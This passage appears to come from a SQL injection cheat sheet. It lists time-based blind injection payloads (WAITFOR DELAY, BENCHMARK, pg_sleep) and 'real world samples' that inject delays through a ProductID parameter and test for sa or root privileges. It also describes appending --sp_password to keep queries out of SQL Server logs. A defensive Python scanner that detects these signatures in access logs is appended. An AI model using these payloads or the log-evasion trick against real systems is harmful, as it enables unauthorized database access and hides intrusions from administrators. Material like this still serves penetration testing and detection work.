This works just like sleep: it waits for the specified time. It is a CPU-safe way to make the database wait.
WAITFOR DELAY '0:0:10'--
You can also use fractions of a second, like this:
WAITFOR DELAY '0:0:0.51'
Real World Samples
• Are we 'sa'?
if (select user) = 'sa' waitfor delay '0:0:10'
• ProductID = 1;waitfor delay '0:0:10'--
• ProductID = 1);waitfor delay '0:0:10'--
• ProductID = 1';waitfor delay '0:0:10'--
• ProductID = 1');waitfor delay '0:0:10'--
• ProductID = 1));waitfor delay '0:0:10'--
• ProductID = 1'));waitfor delay '0:0:10'--
BENCHMARK() (M)
Basically, we are abusing this function to make MySQL wait a bit. Be careful: you will
exhaust the web server's limits very quickly!
BENCHMARK(howmanytimes, do this)
Real World Samples
• Are we root? woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
• Check whether a table exists in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
pg_sleep(seconds) (P)
Sleeps for the supplied number of seconds.
• SELECT pg_sleep(10);
Sleeps for 10 seconds.
Covering Tracks
SQL Server -sp_password log bypass (S)
SQL Server doesn't log queries that include sp_password, for security reasons(!). So if
you add --sp_password to your queries, they will not appear in the SQL Server logs (of course they
will still be in the web server logs; try to use POST if possible).
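
From the defender's side, the delay primitives above and the --sp_password marker remain visible in web server logs when they arrive in a GET request. The following is an added example, not part of the original cheat sheet, that flags them in access-log lines; the combined log format, the signature names and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the delay primitives and the log-evasion marker described above.
SIGNATURES = {
    "mssql_waitfor": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "mysql_benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "pgsql_sleep": re.compile(r"\bpg_sleep\s*\(", re.I),
    "mssql_sp_password": re.compile(r"--\s*sp_password", re.I),
}

# Request target in a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def normalize(target, max_rounds=3):
    """URL-decode until stable so single- and double-encoded requests compare equal."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan_line(line):
    """Return the sorted names of the signatures matched by one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = normalize(match.group(1))
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(target))

def scan_log(lines):
    """Return (line_number, signature_names) for every line with a match."""
    hits = ((n, scan_line(line)) for n, line in enumerate(lines, 1))
    return [(n, names) for n, names in hits if names]

# Constructed sample entries (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /product.asp?ProductID=1;waitfor%20delay%20'0:0:10'-- HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /product.asp?ProductID=1%27%3Bwaitfor+delay+%270%3A0%3A0.51%27--sp_password HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /item.php?id=BENCHMARK(1000000,MD5(1)) HTTP/1.1" 200 498
203.0.113.7 - - [01/Jan/2024:10:00:31 +0000] "GET /search?q=SELECT%2520pg_sleep(10)%253B HTTP/1.1" 200 498
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /docs/benchmark-results?delay=10 HTTP/1.1" 200 2048
""".splitlines()

if __name__ == "__main__":
    for number, names in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(names)}")
```

Requests sent in a POST body never reach the request line, so covering them requires WAF or application-level request logging rather than the access log alone.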